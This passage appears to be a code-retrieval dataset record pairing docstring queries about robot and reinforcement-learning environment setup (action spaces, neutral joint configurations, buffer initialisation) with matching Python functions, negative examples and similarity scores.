attribute)\n\n\t\texcept KeyError:\n\t\t\ttry:\n\t\t\t\treturn dict.__getattr__(self, attribute)\n\n\t\t\texcept AttributeError:\n\t\t\t\ttry:\n\t\t\t\t\treturn NamedObject.__getattr__(self, attribute)\n\n\t\t\t\texcept AttributeError:\n\t\t\t\t\traise AttributeError(\"'%s' %s%s\" % (stylize(ST_BAD, attribute),\n\t\t\t\t\t\t\t'' if attribute in self.__class__._licorn_protected_attrs\n\t\t\t\t\t\t\t\telse ('\\n\\t- it is currently missing from %s '\n\t\t\t\t\t\t\t\t\t'(currently=%s)' % ('%s.%s' % (\n\t\t\t\t\t\t\t\t\t\tstylize(ST_NAME, self.name),\n\t\t\t\t\t\t\t\t\t\tstylize(ST_ATTR,'_licorn_protected_attrs')),\n\t\t\t\t\t\t\t\t', '.join(stylize(ST_COMMENT, value)\n\t\t\t\t\t\t\t\t\tfor value in self.__class__._licorn_protected_attrs))),\n\t\t\t\t\t\t\t'\\n\\t- perhaps you tried to %s a %s?' % (\n\t\t\t\t\t\t\t\tstylize(ST_ATTR, 'getattr()'),\n\t\t\t\t\t\t\t\tstylize(ST_COMMENT, 'property()'))))", "def __getattr__(self, key):\n return self.get_attribute(key)", "def get_attribute(self, name):\n\n pass", "def __tr_getattr__(self, name):\n raise AttributeError(name)", "def __tr_getattr__(self, name):\n raise AttributeError(name)", "def test_getter_shadowing(self):\n class Test(pyperry.Base):\n\n @property\n def foo(self):\n return \"purple\"\n\n Test.attributes('foo')\n test = Test({'foo': 1})\n\n self.assertEqual(test.foo, 'purple')\n self.assertEqual(test['foo'], 1)", "def __getattribute__(self, attr):\n if attr in ['reset_opt_vars', 'initialize_globals',\n 'set_tensor_dict', 'get_tensor_dict',\n 'get_required_tensorkeys_for_function',\n 'initialize_tensorkeys_for_functions',\n 'save_native', 'load_native', 'rebuild_model',\n 'set_optimizer_treatment',\n 'train', 'train_batches', 'validate']:\n return self.runner.__getattribute__(attr)\n return super(FederatedModel, self).__getattribute__(attr)", "def __getattr__(self, attr):\n return getattr(self.door, attr)", "def __getattribute__(self, name):\n # special attribute that need to go straight to this obj\n if name in ['pget', 'pobj', '_delegate', '_wrap', '_get', \n '__class__', '__array_finalize__', 'view', '__tr_getattr__']:\n return object.__getattribute__(self, name)\n\n try:\n return self.__tr_getattr__(name)\n except:\n pass\n\n if hasattr(self.pobj, name):\n return self._wrap(name) \n \n return object.__getattribute__(self, name)", "def __getattr__(self, attr):\n # orig_attr = self._wrapped_env.__getattribute__(attr)\n if hasattr(self._wrapped_env, '_wrapped_env'):\n orig_attr = self._wrapped_env.__getattr__(attr)\n else:\n orig_attr = self._wrapped_env.__getattribute__(attr)\n\n if callable(orig_attr):\n def hooked(*args, **kwargs):\n result = orig_attr(*args, **kwargs)\n return result\n\n return hooked\n else:\n return orig_attr" ]
[ "0.67445457", "0.6710345", "0.66448665", "0.66448665", "0.65809125", "0.6559927", "0.6550173", "0.65467125", "0.6515998", "0.64669317", "0.6441641", "0.6401199", "0.6396703", "0.6377469", "0.6359223", "0.63081247", "0.630343", "0.62833256", "0.62700075", "0.6269952", "0.6243726", "0.6221988", "0.6219931", "0.62127954", "0.62127954", "0.61993635", "0.61885875", "0.61625934", "0.6162532", "0.61428946" ]
0.6841757
0
Configure the action space of the environment. The action is a vector gathering the torques of the actuator of the robot.
def _initialize_action_space(self) -> None: # Get effort limit command_limit = self.robot.command_limit # Replace inf bounds of the effort limit if requested if self.enforce_bounded_spaces: for motor_name in self.robot.motors_names: motor = self.robot.get_motor(motor_name) motor_options = motor.get_options() if not motor_options["enableCommandLimit"]: command_limit[motor.joint_velocity_idx] = \ MOTOR_EFFORT_MAX # Set the action space action_scale = command_limit[self.robot.motors_velocity_idx] self.action_space = spaces.Box( low=-action_scale, high=action_scale, dtype=np.float64)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_up_continuous_action_space(self):\n self.action_space = gym.spaces.Box(shape=(self.action_dim,),\n low=-1.0,\n high=1.0,\n dtype=np.float32)\n self.action_high = self.torque * np.ones([self.action_dim])\n self.action_low = -self.action_high", "def buildActionSpace(self):\n self.action_types = self.AGENT_TYPES\n self.action_space = Dict({\n \"action\": Discrete(len(self.AGENT_TYPES)), \n })\n self.action_space.shape = (len(self.action_types),)", "def set_up_discrete_action_space(self):\n self.action_list = [[self.torque, 0, 0, 0, 0, 0], [-self.torque, 0, 0, 0, 0, 0],\n [0, self.torque, 0, 0, 0, 0], [\n 0, -self.torque, 0, 0, 0, 0],\n [0, 0, self.torque, 0, 0, 0], [\n 0, 0, -self.torque, 0, 0, 0],\n [0, 0, 0, 0, 0, 0]]\n self.action_space = gym.spaces.Discrete(len(self.action_list))\n self.setup_keys_to_action()", "def __init__(self, env: gym.Env):\n Env.__init__(self)\n\n self.env = ShapedActionWrapper(env)\n\n self.state_space = self.env.observation_space.shape\n self.action_space = self.env.action_space.shape", "def _set_action(self, action):\n action = np.asarray(action)\n action = np.clip(action, self.action_space.low, self.action_space.high)\n ctrl = self.robot.denormalize_position_control(\n position_control=action, relative_action=self.constants.relative_action,\n )\n self.robot.set_position_control(ctrl)", "def set_actuator(self, action):\n deltav = action[0]\n vt = np.clip(self.vt + deltav, -self.maxV, self.maxV)\n self.vt = vt\n p.setJointMotorControl2(bodyUniqueId=self.botId,\n jointIndex=0,\n controlMode=p.VELOCITY_CONTROL,\n targetVelocity=vt)\n p.setJointMotorControl2(bodyUniqueId=self.botId,\n jointIndex=1,\n controlMode=p.VELOCITY_CONTROL,\n targetVelocity=-vt)", "def mocap_set_action(self, action):\n # @Melissa: Action = 3DOF Cartesian Position Delta + Quaternion\n if self.sim.model.nmocap > 0:\n action, _ = np.split(action, (self.sim.model.nmocap * 7, ))\n action = action.reshape(self.sim.model.nmocap, 7)\n\n pos_delta = action[:, :3]\n quat_delta = action[:, 3:]\n\n self.reset_mocap2body_xpos()\n self.sim.data.mocap_pos[:] = self.sim.data.mocap_pos + pos_delta\n self.sim.data.mocap_quat[:] = self.sim.data.mocap_quat + quat_delta", "def __init__(self, observation_space, action_space, config, unsupType='action', envWrap=False, designHead='universe', noReward=False):\n self.unsup = unsupType is not None\n self.cur_batch = None\n\n predictor = None\n numaction = action_space.n\n\n config = dict(ray.rllib.agents.a3c.a3c.DEFAULT_CONFIG, **config)\n self.config = config\n self.sess = tf.get_default_session()\n\n # Setup the policy\n # =====================================================================\n self.observations = tf.placeholder(tf.float32, [None] + list(observation_space.shape))\n dist_class, logit_dim = ModelCatalog.get_action_dist(action_space, self.config[\"model\"])\n\n # NOTE: value function and trainable variables are defined in self.model\n # Define the policy network\n self.model = pi = ModelCatalog.get_model(self.observations, logit_dim, self.config[\"model\"])\n action_dist = dist_class(self.model.outputs)\n\n # Define S/S+A predictor network\n if self.unsup:\n with tf.variable_scope(\"predictor\"):\n if 'state' in unsupType:\n self.local_ap_network = predictor = StatePredictor(observation_space.shape, numaction, designHead, unsupType)\n else:\n self.local_ap_network = predictor = StateActionPredictor(observation_space.shape, numaction, designHead)\n\n # Setup the policy loss\n # =====================================================================\n if isinstance(action_space, gym.spaces.Box):\n ac_size = action_space.shape[0]\n actions = tf.placeholder(tf.float32, [None, ac_size], name=\"ac\")\n elif isinstance(action_space, gym.spaces.Discrete):\n actions = tf.placeholder(tf.int64, [None], name=\"ac\")\n else:\n raise UnsupportedSpaceException(\n \"Action space {} is not supported for A3C.\".format(\n action_space))\n advantages = tf.placeholder(tf.float32, [None], name=\"advantages\")\n self.v_target = tf.placeholder(tf.float32, [None], name=\"v_target\")\n\n # compute policy loss and predictor loss\n self.loss = A3CLoss(action_dist, actions, advantages, self.v_target,\n self.model.vf, unsupType, predictor, self.config[\"vf_loss_coeff\"],\n self.config[\"entropy_coeff\"])\n\n # Initialize TFPolicyGraph\n loss_in = [\n (\"obs\", self.observations),\n (\"actions\", actions),\n (\"advantages\", advantages),\n (\"value_targets\", self.v_target),\n ]\n LearningRateSchedule.__init__(self, self.config[\"lr\"],\n self.config[\"lr_schedule\"])\n TFPolicyGraph.__init__(\n self,\n observation_space,\n action_space,\n self.sess,\n obs_input=self.observations,\n action_sampler=action_dist.sample(),\n loss=self.loss.total_loss,\n loss_inputs=loss_in,\n state_inputs=self.model.state_in,\n state_outputs=self.model.state_out,\n seq_lens=self.model.seq_lens,\n max_seq_len=self.config[\"model\"][\"max_seq_len\"])\n\n self.stats_fetches = {\n \"stats\": {\n \"cur_lr\": tf.cast(self.cur_lr, tf.float64),\n \"policy_loss\": self.loss.pi_loss,\n \"policy_entropy\": self.loss.entropy,\n \"grad_gnorm\": tf.global_norm(self._grads),\n \"var_gnorm\": tf.global_norm(self.model.var_list),\n \"vf_loss\": self.loss.vf_loss,\n \"vf_explained_var\": explained_variance(self.v_target, self.model.vf),\n },\n }\n\n self.sess.run(tf.global_variables_initializer())", "def _set_action(self, action):\n\n rospy.logdebug(\"Start Set Action ==>\"+str(action))\n # We convert the actions to speed movements to send to the parent class of Parrot\n linear_speed_vector = Vector3()\n angular_speed = 0.0\n\n if action == 0: # FORWARDS\n linear_speed_vector.x = self.linear_forward_speed\n self.last_action = \"FORWARDS\"\n elif action == 1: # BACKWARDS\n linear_speed_vector.x = -1*self.linear_forward_speed\n self.last_action = \"BACKWARDS\"\n elif action == 2: # STRAFE_LEFT\n linear_speed_vector.y = self.linear_forward_speed\n self.last_action = \"STRAFE_LEFT\"\n elif action == 3: # STRAFE_RIGHT\n linear_speed_vector.y = -1*self.linear_forward_speed\n self.last_action = \"STRAFE_RIGHT\"\n elif action == 4: # UP\n linear_speed_vector.z = self.linear_forward_speed\n self.last_action = \"UP\"\n elif action == 5: # DOWN\n linear_speed_vector.z = -1*self.linear_forward_speed\n self.last_action = \"DOWN\"\n\n # We tell drone the linear and angular speed to set to execute\n self.move_base(linear_speed_vector,\n angular_speed,\n epsilon=0.05,\n update_rate=10)\n\n rospy.logdebug(\"END Set Action ==>\"+str(action))", "def __init__(self, env):\n self.env = env\n # set up observation space\n high = np.inf\n low = -high\n\n obs_spec = env.observation_spec()\n\n space_spec = {}\n\n for k,v in obs_spec.items():\n space_spec[k]=spaces.Box(low=low,high=high, shape=v)\n\n\n self.observation_space = spaces.Dict(space_spec)\n\n # setup action space\n low, high = self.env.action_spec\n self.action_space = spaces.Box(low=low, high=high)\n\n self.reward_range = self.env.reward_range", "def _setup_spaces(self):\n # Actions are the changes in weights of risky\n N = self.n_risky_assets\n self.action_space = gym.spaces.Box( low = -np.ones( (N,) ), \n high = +np.ones( (N,) ) )\n \n # Define the dimensions of the observation space, starting with the portfolio value & weights\n param_ranges = self.asset_process.get_parameter_ranges()\n min_asset_val, max_asset_val = -np.inf, np.inf\n low = min_asset_val * np.ones((N+1,))\n high = max_asset_val * np.ones((N+1,))\n \n if self.benchmark_weights is not None:\n # Repeat the low / high limits for the benchmark\n low = np.hstack( [ low, low ] )\n high = np.hstack( [ high, high ] )\n \n # Add the parameter ranges\n low = np.hstack( [ low, param_ranges.low ] )\n high = np.hstack( [ high, param_ranges.high ] )\n \n # Add the timestamp, for non-recurrent environments\n if not self.is_recurrent:\n low = np.hstack( [ 0, low ] )\n high = np.hstack( [ self.max_episode_steps, high ] )\n \n self.observation_space = gym.spaces.Box( low=low, high=high )", "def apply_action(self, physics, action, random_state):\n del random_state\n physics.bind(self.actuators).ctrl = action", "def ctrl_set_action(self, action):\n\n # @Melissa: This needs to be changed because you have 6DOF on the EndEffector, but this only does the last three\n for i in (-1, -2, -3):\n self.sim.data.ctrl[i] = action[i]", "def __init__(\n self,\n num_envs: int,\n observation_space: gym.Space,\n action_space: gym.Space,\n ):\n self.num_envs = num_envs\n self.is_vector_env = True\n self.observation_space = batch_space(observation_space, n=num_envs)\n self.action_space = batch_space(action_space, n=num_envs)\n\n self.closed = False\n self.viewer = None\n\n # The observation and action spaces of a single environment are\n # kept in separate properties\n self.single_observation_space = observation_space\n self.single_action_space = action_space", "def initObservationAndActionSpaces(self):\n self.action_space = self.microgridPolicy.createActionSpace();\n self.observation_space = self.microgridPolicy.createObservationSpace();", "def define_spaces(self) -> None:\n self.observation_type = observation_factory(self, self.config[\"observation\"])\n self.action_type = action_factory(self, self.config[\"action\"])\n self.observation_space = self.observation_type.space()\n self.action_space = self.action_type.space()", "def action_space(self):\n\n return Box(low=np.array(self.action_low), high=np.array(self.action_high), dtype=np.float32)", "def __init__(self, env):\n super(PlayerOneNetworkControllerWrapper, self).__init__(env)\n buttons = [\"B\", \"A\", \"MODE\", \"START\", \"UP\", \"DOWN\", \"LEFT\", \"RIGHT\", \"C\", \"Y\", \"X\", \"Z\"]\n actions = [['LEFT'], ['RIGHT'], ['LEFT', 'DOWN'], ['RIGHT', 'DOWN'],['LEFT', 'UP'],['RIGHT', 'UP'],\n ['DOWN', 'B'],['LEFT', 'UP'],['RIGHT', 'DOWN','B'],['RIGHT', 'DOWN','A'],\n ['RIGHT', 'UP','B'],['RIGHT', 'UP','A'],['RIGHT', 'UP','C'],\n ['LEFT', 'UP','B'],['LEFT', 'UP','A'],['LEFT', 'UP','C'],\n ['C'],['START'], ['B'],['Y'],['X'],['Z'],['A'],['UP'],['MODE']]\n self._actions = []\n for action in actions:\n arr = np.array([False] * 12)\n for button in action:\n arr[buttons.index(button)] = True\n self._actions.append(arr)\n self.action_space = gym.spaces.Discrete(len(self._actions))", "def apply_action(self, action):\n real_action = self.policy_action_to_robot_action(action)\n p.setGravity(0, 0, 0)\n p.resetBaseVelocity(\n self.robot_ids[0], real_action[:3], real_action[3:])", "def action_space(self, val: Union[List[ActionSpace], ActionSpace]):\n self._action_space = val", "def __init__(self, environment):\n self.env = environment\n self.cumreward = 0 # tracking cumulative reward\n self.samples = 0 # tracking the number of samples\n\n self.sensor_limits = None\n self.actor_limits = None\n self.clipping = True\n\n self.current_action = 0 # Saving current action\n self.prev_action = -1 # Saving previous action", "def __init__(self, env, num_actions):\n super(MultiBinaryPadEnv, self).__init__(env)\n assert num_actions >= env.action_space.n\n self._num_actions = num_actions\n self.action_space = gym.spaces.MultiBinary(num_actions)", "def action_space(self):\n return Box(low=-5, high=5, shape=(self.num_cars, ))", "def action_space(self):\n return gym.spaces.Discrete(self._action_dim)", "def __init__(\n self,\n states_spec,\n actions_spec,\n batched_observe=1000,\n scope='constant',\n action_values=None\n ):\n\n if action_values is None:\n raise TensorForceError(\"No action_values for constant model provided.\")\n self.action_values = action_values\n\n super(ConstantAgent, self).__init__(\n states_spec=states_spec,\n actions_spec=actions_spec,\n batched_observe=batched_observe,\n scope=scope\n )", "def get_environment_actions(self, init_act):\n # Set initial values for environment variables\n time_of_day = \"2020-10-23T06:00:00\"\n time_animation = \"false\"\n cloud_state = \"free\"\n fog_range = \"100000\"\n sun_intensity = \"0.85\"\n sun_azimuth = \"0\"\n sun_elevation = \"1.31\"\n percip_type = \"dry\"\n percip_intensity = \"0\"\n\n try:\n env_layer = QgsProject.instance().mapLayersByName(\"Environment\")[0]\n for feature in env_layer.getFeatures():\n time_of_day = feature[\"Datetime\"]\n time_animation = str(feature[\"Datetime Animation\"]).lower()\n cloud_state = feature[\"Cloud State\"]\n fog_range = str(feature[\"Fog Visual Range\"])\n sun_intensity = str(feature[\"Sun Intensity\"])\n sun_azimuth = str(feature[\"Sun Azimuth\"])\n sun_elevation = str(feature[\"Sun Elevation\"])\n percip_type = feature[\"Precipitation Type\"]\n percip_intensity = str(feature[\"Precipitation Intensity\"])\n except IndexError:\n error_message = \"No environment variables detected, using defaults\"\n iface.messageBar().pushMessage(\"Info\", error_message, level=Qgis.Info)\n QgsMessageLog.logMessage(error_message, level=Qgis.Info)\n self._warning_message.append(f\"Info: {error_message}\")\n\n time_of_day = \"2020-10-23T06:00:00\"\n time_animation = \"false\"\n cloud_state = \"free\"\n fog_range = \"100000\"\n sun_intensity = \"0.85\"\n sun_azimuth = \"0\"\n sun_elevation = \"1.31\"\n percip_type = \"dry\"\n percip_intensity = \"0\"\n\n global_act = etree.SubElement(init_act, \"GlobalAction\")\n env_act = etree.SubElement(global_act, \"EnvironmentAction\")\n environ = etree.SubElement(env_act, \"Environment\")\n environ.set(\"name\", \"Environment1\")\n\n env_time = etree.SubElement(environ, \"TimeOfDay\")\n env_time.set(\"animation\", time_animation)\n env_time.set(\"dateTime\", time_of_day)\n\n weather = etree.SubElement(environ, \"Weather\")\n weather.set(\"cloudState\", cloud_state)\n weather_sun = etree.SubElement(weather, \"Sun\")\n weather_sun.set(\"intensity\", sun_intensity)\n weather_sun.set(\"azimuth\", sun_azimuth)\n weather_sun.set(\"elevation\", sun_elevation)\n weather_fog = etree.SubElement(weather, \"Fog\")\n weather_fog.set(\"visualRange\", fog_range)\n weather_percip = etree.SubElement(weather, \"Precipitation\")\n weather_percip.set(\"precipitationType\", percip_type)\n weather_percip.set(\"intensity\", percip_intensity)\n\n env_road = etree.SubElement(environ, \"RoadCondition\")\n env_road.set(\"frictionScaleFactor\", \"1.0\")", "def action_space(self) -> gym.spaces.Dict:\n return gym.spaces.Dict(\n throttle=gym.spaces.Box(\n low=0.0,\n high=1.0,\n shape=(),\n dtype=np.float32,\n ),\n steer=gym.spaces.Box(\n low=-1.0,\n high=1.0,\n shape=(),\n dtype=np.float32,\n ),\n brake=gym.spaces.Box(\n low=0.0,\n high=1.0,\n shape=(),\n dtype=np.float32,\n ),\n )", "def apply_action(self, action):\n robot_state = self.get_state('turtlebot3_waffle_pi','world')\n robot_x = robot_state.pose.position.x\n robot_y = robot_state.pose.position.y\n # Set the distance moved in an action such that it is at least as large as the\n # minimum distance that would let a robot in the middle of the goal go to either side\n #self.move_dist = max(((C.GOAL_TOP + C.GOAL_BOTTOM) / 2) / C.NUM_POS_SENDS, 0.5)\n if action == Learn.MOVE_LEFT:\n print(\"Move left\")\n self.set_robot(robot_x, robot_y+self.move_dist)\n elif action == Learn.MOVE_RIGHT:\n print(\"Move right\")\n self.set_robot(robot_x, robot_y-self.move_dist)\n else:\n print(\"Stay put\")", "def __init__(self, env, dim_permutation=[0,1,2]):\n super().__init__(env)\n self.dim_permutation = dim_permutation\n old_shape = np.array(self.observation_space.shape)\n new_space = gym.spaces.Box(\n low=0,\n high=255,\n shape=old_shape[dim_permutation],\n dtype=np.uint8,\n )\n self.observation_space = new_space", "def action_space(self, curr_state):\n # Action space - allowed (position, value) combinations for the agent and environment given the current state\n\n agent_actions = list(product(self.allowed_positions(curr_state), self.allowed_values(curr_state)[0]))\n env_actions = list(product(self.allowed_positions(curr_state), self.allowed_values(curr_state)[1]))\n return (agent_actions, env_actions)" ]
[ "0.6897351", "0.6872064", "0.6778322", "0.6433614", "0.62521344", "0.6221735", "0.61467814", "0.6123499", "0.61089486", "0.60900205", "0.60286", "0.60075194", "0.5947461", "0.5933904", "0.5894918", "0.58863795", "0.584985", "0.57926476", "0.5792396", "0.57770336", "0.57563627", "0.5688972", "0.56786484", "0.5657426", "0.5656682", "0.5653684", "0.5643079", "0.5637894", "0.56307846", "0.56233114" ]
0.706857
0
Returns a neutral valid configuration for the robot. The default implementation returns the neutral configuration if valid, the "mean" configuration otherwise (right in the middle of the position lower and upper bounds).
def _neutral(self) -> np.ndarray: # Get the neutral configuration of the actual model qpos = neutral(self.robot.pinocchio_model) # Make sure it is not out-of-bounds position_limit_lower = self.robot.position_limit_lower position_limit_upper = self.robot.position_limit_upper for idx, val in enumerate(qpos): lo, hi = position_limit_lower[idx], position_limit_upper[idx] if hi < val or val < lo: qpos[idx] = 0.5 * (lo + hi) # Return rigid/flexible configuration if self.simulator.use_theoretical_model: return qpos[self.robot.rigid_joints_position_idx] return qpos
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_default_config(self):\n \n config = {}\n \n # default z_0_hat, zeros, flexible\n config['z_0_hat_option'] = 'flexible'\n config['initial_z_0_hat'] = np.zeros(self.dimension)\n \n # default P_0_hat, identity times a small scalar, flexible\n config['P_0_hat_option'] = 'flexible'\n config['initial_P_0_hat'] = 0.1 * np.eye(self.dimension)\n \n # default A, identity, flexible\n config['AB_option'] = 'flexible'\n config['initial_A'] = np.eye(self.dimension)\n config['initial_B'] = np.zeros((self.dimension, self.control_dimension))\n \n # default Q, identity times a small scalar, flexible\n config['Q_option'] = 'flexible'\n config['initial_Q'] = 0.1 * np.eye(self.dimension)\n \n # default R, identity times a small scalar, flexible\n config['R_option'] = 'flexible'\n config['initial_R'] = 0.1 * np.eye(self.dimension)\n \n # default stopping criteria, threshold 1e-5, num_iterations 1000\n # stop whenever either of the two critieria is reached\n config['threshold'] = 1e-5\n config['num_iterations'] = 1000\n\n return config", "def get_default_configuration():\n # Pre-configured default values for various parameters:\n default_config = {\n \"name\":\"Transient\",\n \"auto\":True,\n \"ra\":0.0,\n \"dec\":0.0,\n \"radius\":10.0,\n \"resolution\":1.8,\n \"energy\":70.0,\n \"pixsize\": 16,\n \"respcode\":\"czti_Aepix.out\",\n \"txycode\":\"radec2txty.out\",\n \"resppath\":\"pixarea\",\n \"plotfile\":\"plots/localize.pdf\",\n\t \"lc_bin\":5.0,\n\t \"typ\":\"band\",\n\t \"comp_bin\":20,\t\n \"verbose\":True,\n \"do_fit\":True\n }\n required_config = {\n 'l2file':\"_level2.evt\",\n 'infile':\"file.evt\",\n 'mkffile':\"file.mkf\",\n 'trigtime':0.00,\n 'transtart':0.00,\n 'tranend':0.00,\n 'bkg1start':0.00,\n 'bkg1end':0.00,\n 'bkg2start':0.00,\n 'bkg2end':0.00,\n\t 'alpha':0.00,\n\t 'beta':0.00,\n\t 'E0':0.00,\n\t 'A':0.00\n }\n return default_config, required_config", "def default_config(cls):\n return {\n \"observation\": {\n \"type\": \"TimeToCollision\"\n },\n \"policy_frequency\": 1, # [Hz]\n \"other_spacecrafts_type\": \"space_env.spacecraft.behavior.IDMspacecraft\",\n \"screen_width\": 600, # [px]\n \"screen_height\": 600, # [px]\n \"centering_position\": [0.3, 0.5],\n \"show_trajectories\": False\n }", "def antenny_config_load_default(self):\n return self.antenny_config.load_default_config()", "def _GetDefaultConfig(self) -> str:\n try:\n region = util.GetRegionFromZone(\n FLAGS.zones[0] if FLAGS.zones else FLAGS.zone[0])\n except IndexError:\n region = _DEFAULT_REGION\n return f'regional-{region}'", "def default_config():\n return {'grid': {'regular': {'width': 0.05,\n 'wake': {'width': 0.1, 'progression': None},\n 'layers': 50,\n 'thickness': 5,\n 'boundary_layer': { 'initial_thickness': 4.2e-5 }}}}", "def default_config(cls) -> dict:\n return {\n \"observation\": {\n \"type\": \"Kinematics\"\n },\n \"action\": {\n \"type\": \"DiscreteMetaAction\"\n },\n \"simulation_frequency\": 15, # [Hz]\n \"policy_frequency\": 1, # [Hz]\n \"other_vehicles_type\": \"highway_env.vehicle.behavior.IDMVehicle\",\n \"screen_width\": 600, # [px]\n \"screen_height\": 150, # [px]\n \"centering_position\": [0.3, 0.5],\n \"scaling\": 5.5,\n \"show_trajectories\": False,\n \"render_agent\": True,\n \"offscreen_rendering\": os.environ.get(\"OFFSCREEN_RENDERING\", \"0\") == \"1\",\n \"manual_control\": False,\n \"real_time_rendering\": False\n }", "def antenny_config_make_default(self):\n return self.antenny_config.save_as_default_config()", "def stand_alone_config(self) -> Optional['outputs.CSIPowerMaxRevProxySpecConfigStandAloneConfig']:\n return pulumi.get(self, \"stand_alone_config\")", "def default_setting(self):\n\t\tdo_log = False if self.debug else True\n\t\tdo_validation, do_summary = False, False\n\t\tlog_step = 2\n\t\tepochs = 50\n\t\tvali_k = 5\n\n\t\t'''on the usage of mask_label\n\t\t(1) given a supervised dataset, True means that mask a supervised data to mimic unsupervised data\n\t\t(2) given an unsupervised dataset, this setting is not supported, since it is already an unsupervised data\n\t\t'''\n\t\tmask_label = False\n\t\tif mask_label:\n\t\t\tassert not self.data_id in MSLETOR_SEMI\n\t\t\tmask_ratio = 0.1\n\t\t\tmask_type = 'rand_mask_rele'\n\t\telse:\n\t\t\tmask_ratio = None\n\t\t\tmask_type = None\n\n\t\t# more evaluation settings that are rarely changed\n\t\tself.eval_dict = dict(debug=self.debug, grid_search=False, dir_output=self.dir_output,\n\t\t\t\t\t\t cutoffs=[1, 3, 5, 10, 20, 50], do_validation=do_validation, vali_k=vali_k,\n\t\t\t\t\t\t do_summary=do_summary, do_log=do_log, log_step=log_step, loss_guided=False, epochs=epochs,\n\t\t\t\t\t\t mask_label=mask_label, mask_ratio=mask_ratio, mask_type=mask_type)\n\n\t\treturn self.eval_dict", "def default_config(self) -> Optional['outputs.FeatureSpecFleetobservabilityLoggingConfigDefaultConfig']:\n return pulumi.get(self, \"default_config\")", "def default(self):\n return self._configs[0] if len(self._configs) else None", "def _expected_config(self) -> Dict[str, Optional[str]]:\n return EXPECTED_CONFIG", "def _expected_config(self) -> Dict[str, Optional[str]]:\n return EXPECTED_CONFIG", "def get_moving_average_configuration(self):\n return GetMovingAverageConfiguration(*self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_GET_MOVING_AVERAGE_CONFIGURATION, (), '', 'H H'))", "def random_configuration(self):\n raise NotImplementedError", "def test_no_default(self):\n with self.assertRaises(ConfigError) as cm:\n imageroller.main.read_config(\n self._cmd_args,\n imageroller.test.get_config_parser(self._no_default))\n # ConcurrentWorkers is the first value that is checked\n self.assertEqual(str(cm.exception),\n \"Config must contain ConcurrentWorkers\")", "def _default_config(self):\n return {\n 'penalty': 'l1',\n 'solver': 'liblinear'\n }", "def get_default_evaluator(self) -> EvaluatorConfig:\n raise NotImplementedError()", "def _getDefaultSettings(cls):\n return {'minimumROIDimensions': 1,\n 'minimumROISize': None, # Skip testing the ROI size by default\n 'normalize': False,\n 'normalizeScale': 1,\n 'removeOutliers': None,\n 'resampledPixelSpacing': None, # No resampling by default\n 'interpolator': 'sitkBSpline', # Alternative: sitk.sitkBSpline,\n 'padDistance': 5,\n 'distances': [1],\n 'force2D': False,\n 'force2Ddimension': 0,\n 'label': 1,\n 'enableCExtensions': True,\n 'additionalInfo': True}", "def clean_conf(self):\r\n return self._arm.clean_conf()", "def _config_min(self):\n self.cntrl[\"imin\"] = 1\n self.cntrl[\"ntx\"] = 1\n self.cntrl[\"irest\"] = 0\n self.cntrl[\"maxcyc\"] = 5000\n self.cntrl[\"ncyc\"] = 1000\n self.cntrl[\"dt\"] = 0.0\n self.cntrl[\"nstlim\"] = 0\n self.cntrl[\"ntpr\"] = 100\n self.cntrl[\"ntwr\"] = 5000\n self.cntrl[\"ntwx\"] = 0\n self.cntrl[\"ntwe\"] = 0\n self.cntrl[\"ntxo\"] = 1\n self.cntrl[\"ntf\"] = 1\n self.cntrl[\"ntc\"] = 1\n self.cntrl[\"ntt\"] = 0\n self.cntrl[\"gamma_ln\"] = 0.0\n self.cntrl[\"ig\"] = 0\n self.cntrl[\"ntp\"] = 0\n self.cntrl[\"barostat\"] = 0\n self.mdcrd = None\n self.mden = None", "def default(cls) -> 'Config':\n parser: configparser.ConfigParser = configparser.ConfigParser()\n parser.read_dict(dict(wpwatcher=Config.DEFAULT_CONFIG))\n return cls.fromparser(parser)", "def getDefaultConfig():\n config = {\n \"samples\": _DEFAULT_SAMPLE_COUNT,\n \"channel\": \"all\",\n \"rate\": _DEFAULT_SAMPLE_RATE,\n \"update\": 1,\n \"output\": \"data.rld\",\n \"format\": \"rld\",\n \"size\": _DEFAULT_FILE_SIZE,\n \"comment\": _DEFAULT_FILE_COMMENT,\n \"digital\": True,\n \"ambient\": False,\n \"aggregate\": \"downsample\",\n \"high-range\": [],\n \"web\": False,\n }\n return config", "def default_if_not_defined(cls, tolerates=None):\n if tolerates is None:\n return cls.default()\n else:\n return tolerates", "def empty_geno_from_cfg(cfg: Config):\n\n return from_ratios(cfg.initial_genetic_ratios)", "def metrics_defaults(self) -> Tuple[float, ...]:\n return (\n MIN_AP,\n self.tp_threshold_m,\n MAX_NORMALIZED_ASE,\n MAX_YAW_RAD_ERROR,\n MIN_CDS,\n )", "def get_default_config():\n # pylint: disable=cyclic-import\n from raylab.agents.sac import DEFAULT_CONFIG\n\n return DEFAULT_CONFIG", "def imu_load_default(self):\n return self.imu_config.load_default_config()", "def antenny_config_reset(self):\n return self.antenny_config.reset_default_config()" ]
[ "0.57778156", "0.55688155", "0.5520987", "0.54586405", "0.5457967", "0.54159516", "0.53503996", "0.5339682", "0.52812344", "0.5193692", "0.5190576", "0.51527995", "0.5146403", "0.5146403", "0.51304436", "0.5123697", "0.51159203", "0.5101688", "0.5077906", "0.5066523", "0.50080395", "0.4988228", "0.49872074", "0.4983842", "0.49663815", "0.49592578", "0.4916013", "0.48883277", "0.48750326", "0.486934" ]
0.6328567
0
Initialize internal buffers for fast access to shared memory or to avoid redundant computations.
def _initialize_buffers(self) -> None:
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
